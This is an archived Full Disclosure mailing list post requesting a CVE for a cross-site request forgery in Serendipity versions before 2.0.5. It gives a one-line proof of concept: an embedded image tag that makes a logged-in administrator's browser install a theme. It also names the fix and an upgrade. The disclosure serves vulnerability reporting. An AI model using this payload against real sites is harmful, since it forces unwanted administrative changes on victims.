Full Disclosure mailing list archives
CVE Request:CSRF in Serendipity allows attacker installs any themes
From: Wester 95 <evilzyzeng () outlook com>
Date: Sun, 9 Apr 2017 10:17:46 +0000
Hi team, I would like to request one CVE id, thank you! Details ====== Software: s9y Serendipity Version: <2.0.5 Homepage: https://docs.s9y.org/ ======= Description ================ Get type CSRF in Serendipity allows attacker installs any themes, no token here. POC: ======== include this in the page ,then attack will occur: <img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartleby”> Mitigations ======= update to Serendipity v2.1.x ======== FIX: ========== https://github.com/s9y/Serendipity/issues/452 Best regards, Zhiyang Zeng of Tencent security platform department _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE Request:CSRF in Serendipity allows attacker installs any themes Wester 95 (Apr 11)